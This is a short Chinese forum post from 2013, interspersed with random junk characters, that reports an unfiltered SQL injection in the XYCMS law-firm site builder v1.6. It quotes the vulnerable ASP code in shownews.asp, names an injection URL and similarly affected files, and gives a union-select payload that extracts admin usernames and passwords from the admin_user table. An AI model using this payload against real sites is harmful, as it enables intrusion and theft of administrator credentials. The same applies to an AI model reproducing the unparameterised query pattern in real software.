前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
0 D( L1 y0 b0 c0 M7 z, P$ V
4 {5 i. R/ {/ A* d5 i( c4 P6 {淫荡分割线# E+ H# F3 V) K
--------------------------------------------------------
( a( \' A5 M. X& M, ]$ _8 F% x
, h0 H I9 {- q. ^审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)3 j3 v9 `, a; k: v
源码地址:http://down.chinaz.com/soft/29233.htm
7 D( [! X5 h* v. R5 \ & i: p! a) A/ A* S0 \. \
漏洞文件:shownews.asp* A. h F8 j6 c' Q9 n1 _0 B# q
漏洞代码:7-13行
2 t3 e# N P3 u, |# |& j 8 z6 `4 R$ Y+ \& O- z
$ z/ J2 F3 e3 t/ d<% # ^+ R- t: v, |6 M# W* |( Y
id=request.QueryString("id")
" V1 C7 J% R" _* ]# X, n/ f
. N" T* c0 A6 r' q/ k+ Dset snews=server.createobject("adodb.recordset") 2 H, T/ T* t5 j. ]) l1 u
exec="select * from [news] where id="&id
, _( P4 Y# M' f" f0 D" M+ hsnews.open exec,conn,1,12 L# ~6 }( S7 z
%>8 n, k `) a# \, S+ }
( q! A( ?7 R5 d" c! a. l$ h . R5 e" L9 e1 h9 l) [
什么过滤都没有 直造成注入* V$ L4 J# u5 ]% L c3 @
' B# v, z4 B1 {2 W) c7 a' Z
注入点:http://127.0.0.1:99/shownews.asp?id=xx
. K5 ~0 Z; ~' K/ D: b / W% i# v4 N$ M# T
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, e1 W: Z8 o0 r1 i; } + x0 n3 O6 u$ L; o1 m
& G$ x7 R: C( S9 }& P* b9 e
exp: union select 1,admin,password,4,5,7 from admin_user/ a3 c! C! d3 b% j, M1 Z
+ M2 e0 i1 M3 Y5 D! C
|
发表于 2013-4-4 17:28:12
收藏
支持
反对